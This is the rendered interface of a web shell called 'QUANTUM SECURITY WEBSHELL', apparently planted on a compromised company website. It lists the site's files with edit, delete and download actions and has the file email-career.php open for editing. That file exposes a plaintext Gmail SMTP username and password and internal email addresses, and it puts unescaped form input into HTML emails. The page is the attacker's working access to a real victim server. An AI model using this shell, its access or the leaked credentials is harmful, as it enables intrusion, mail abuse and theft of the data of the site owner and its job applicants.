QUANTUM SECURITY WEBSHELL
≡
Server IP: 198.38.85.171
Client IP: 216.73.216.150
Server Info: Apache
PHP Version: 8.1.33
Current Path: /var/www/0e42a224-a8c4-422f-9596-709894267d02/public_html
Current Directory:
var
/
www
/
0e42a224-a8c4-422f-9596-709894267d02
/
public_html
/
Name
Size
Actions
..
[DIR]
[Open]
[Delete]
[Rename]
.htaccess
2378 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
.well-known
0 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
Event_test.php
8264 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
about-us.php
14070 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
admin
[DIR]
[Open]
[Delete]
[Rename]
assets
[DIR]
[Open]
[Delete]
[Rename]
blog-inner.php
5043 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
blog.php
15175 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
career-with-us.php
27148 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
class.phpmailer.php
76843 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
class.smtp.php
39906 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
conn.php
718 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
contact-us.php
8558 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
core-products.php
7420 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
cta.php
1199 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
download.php
2537 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
drager-x-node.php
8466 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-career.php
8256 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-contact.php
9579 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
email-popup_modal.php
8911 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
faqs.php
4413 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
footer.php
24988 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-photos.php
4397 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-photos.zip
143482593 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gallery-video.php
1889 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
gs-bharat_03032026.zip
143417148 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
header.php
25305 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
images
[DIR]
[Open]
[Delete]
[Rename]
index.php
0 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
industries-we-serve.php
6045 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
key-customers.php
5088 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
knowledge-center.php
8707 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
news-event.php
7536 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
news-innernew.php
8466 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
our-product-range.php
10595 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
our-team.php
6075 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
page-not-found.php
1583 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
privacy-policy.php
18267 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
prod.php
16217 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details-bkp-190424.php
32730 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details.php
9610 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-details1.php
53879 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner-bkp-190423.php
41085 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner.php
5163 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-inner2.php
26151 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-items.php
5209 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
product-sub-category.php
18092 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
products-sub-menu.php
4073 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
robots.txt
79 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
services.php
4249 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
solver.txt
38 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
terms-and-condition.php
27028 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
thank-you.php
1673 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
web.config
3176 bytes
[Open]
[Edit]
[Delete]
[Download]
[Rename]
Editing: email-career.php
<?php // include 'header.php'; // include 'connect.php'; // include 'admin/conn.php'; include 'class.phpmailer.php'; include 'class.smtp.php'; function emailer($to, $bcc, $from, $from_name, $subject, $message) { try { $mail = new PHPMailer(); $smtp_debug = true; // Enable SMTP debugging /* if ($smtp_debug) { $mail->SMTPDebug = 3; // Set debug output level $mail->Debugoutput = 'html'; // Show debug output in HTML format }*/ $mail->SMTPAuth = true; $mail->isSMTP(); // Set mailer to use SMTP $mail->Host = 'smtp.gmail.com'; $mail->Username = 'canadaobotz@gmail.com'; $mail->Password = 'lnlcvreraoqennsf'; // SMTP password $mail->SMTPSecure = 'ssl'; // Enable TLS encryption, `ssl` also accepted $mail->Port = 465; $mail->setFrom($mail->Username, $from_name); // Set sender email and name // Add recipients in the 'To' field $AddressARRAY = explode(",", $to); foreach ($AddressARRAY as $address) { if (!empty($address)) { $mail->addAddress($address); // Add a 'To' recipient } } // Add recipients in the 'BCC' field $BccARRAY = explode(",", $bcc); foreach ($BccARRAY as $bccAddress) { if (!empty($bccAddress)) { $mail->addBCC($bccAddress); // Add a 'BCC' recipient } } $mail->addReplyTo($from); // Add reply-to address // Set email format to HTML $mail->isHTML(true); $mail->Subject = $subject; // Set the subject $mail->Body = $message; // Set the HTML body $mail->AltBody = strip_tags($message); // Set the alternative plain text body // Send the email and handle errors if (!$mail->send()) { echo 'Mailer error: ' . $mail->ErrorInfo; return false; // Return false if the mailer fails } else { return true; // Return true if the mail is sent successfully } } catch (Exception $e) { echo 'Exception caught: ', $e->getMessage(), "\n"; return false; } } //var_dump($mail);die; if (isset($_POST["submit"])) { $fname = $_POST['fname']; $lname = $_POST['lname']; $email = $_POST['email']; $phone = $_POST['phone']; $selectOption = $_POST['selectOption']; $message = $_POST['message']; $errors = array(); if ($fname == "") { $errors['fname'] = 'name is required'; } elseif (preg_match('~[0-9]+~', $fname)) { $errors['fname'] = 'name cannot contain numeric characters'; } $phonePattern = '/^\d{10}$/'; // This pattern assumes a 10-digit phone number if (empty($phone)) { $errors['phone'] = 'Phone Number is required'; } elseif (!preg_match($phonePattern, $phone)) { $errors['phone'] = 'Invalid phone number format'; } if (empty($message)) { $errors['message'] = 'Message is required'; } else if (strpos($message, 'Ð') !== false || strpos($message, '') !== false || strpos($message, '@') !== false) { $errors['message'] = 'The character "Ð" is not allowed in the message.'; } else if (preg_match('/https?:\/\/.*\b/', $message)) { $errors['message'] = 'Links are not allowed in the message.'; } else if (preg_match('/\bhttps?:\/\/\S+/', $message)) { $errors['message'] = 'Links are not allowed in the message.'; } if (empty($errors)) { // $sql = "INSERT INTO contact (fname,email,phone,pcode,childage,message) // VALUES ('$fname','$lname','$email','$phone','$pcode','$childage','$message')"; // $result = mysqli_query($conn, $sql); if ($email) { // emailer($to,$from,$from_name,$subject,$message); // echo $test;die; $to = "sohel@vcantech.com"; $to1 = $email; $subject = 'Contact Us Inquiry'; if (!filter_var($email, FILTER_VALIDATE_EMAIL)) { echo "KINDLY PROVIDE VALID EMAIL"; } else { $body = ' <!DOCTYPE html> <html> <style> table { border : 1px solid #ddd; } table tr td{ padding: 5px; color:#000; } table, th, td { border : 1px solid #ddd; border-collapse: collapse; } table tr td:first-child {width: 40%;} tr, td , th { padding: 5px; text-align: left; } table#t01 tr:nth-child(even) {s background-color: #eee; } .footer{ text-align: center; background-color: #ec1a23; color: white; padding: 3px; } .logo{ text-align: center; /*background: #c4f1f1;*/ padding: 10px; } </style> <body> <tr> <div class="logo"> <a data-cursor="pointer" data-cursor="pointer" href="http://gs-bharat.com/"><img src="http://gs-bharat.com/assets/img/glosol-logo.png" width="25%" height="auto" /></a> </div> </tr><br> <tr> </tr><br> <h5>Hello GLOSOL Team</h5> <p>We have received an Contact inquiry from <b>' . $fname . '.</b></p> <table width="100%" bgcolor="#fff"cellpadding="0" cellspacing="0" border="" align="center" class="devicewidth"> <tbody> <tr> <td>Full Name</td> <td>' . $fname . ' ' . $lname .' </td> </tr> <tr> <td>Email</td> <td>' . $email . '</td> </tr> <tr> <td>Mobile</td> <td>' . $phone . '</td> </tr> <tr> <tr> <td>Position to Apply</td> <td>' . $selectOption . '</td> </tr> <tr> <td>Message</td> <td>' . $message . '</td> </tr> </tbody> </table> <br> <div class= "footer" style=" text-align: center; background: black; padding: 2px; font-weight: 600;"> <p>Copyrights 2024, All rights Reserved by GLOSOL</P> </div> </body> </html>'; //var_dump($body);die; $Body1 = ' <!DOCTYPE html> <html> <style> table { border : 1px solid #ddd; } table tr td{ padding: 5px; color:#000; } table, th, td { border : 1px solid #ddd; border-collapse: collapse; } table tr td:first-child {width: 40%;} tr, td , th { padding: 5px; text-align: left; } table#t01 tr:nth-child(even) {s background-color: #eee; } .footer{ text-align: center; background-color: #db282c; color: white; padding: 3px; } .logo{ text-align: center; /*background: #c4f1f1;*/ padding: 10px; } </style> <body> <tr> <div class="logo"> <a data-cursor="pointer" data-cursor="pointer" href="http://gs-bharat.com/"><img src="http://gs-bharat.com/assets/img/glosol-logo.png" width="25%" height="auto" /></a> </div> </tr><br> <tr> </tr><br> <h5>Hello <b>' . $fname . '.</b></h5> <p>Thank you for reaching out and expressing interest in GLOSOL. <br> We received your valuable information, For any further questions, feel free to get in touch. Have a great day! <br><br>Best Regards,<br>Team - GLOSOL </p> <br> <div class= "footer" style=" text-align: center; background: #db282c; padding: 2px; font-weight: 600;"> <p style="color:white">Copyrights 2024, All rights Reserved by GLOSOL</P> </div> </body> </html>'; // var_dump($Body1);die; } $email_bcc = 'testing@vcantech.com'; emailer('info@gs-bharat.com', $email_bcc, $to1, $fname, 'Career Form-Website', $body); emailer($to1, '','info@gs-bharat.com', 'Glosol', 'Thank you for contacting!', $Body1); header('Location:thank-you.php'); } else { header('Location:contact-us.php'); } } else { header('Location:contact-us.php'); } } ?>
Coded by
Ken.ph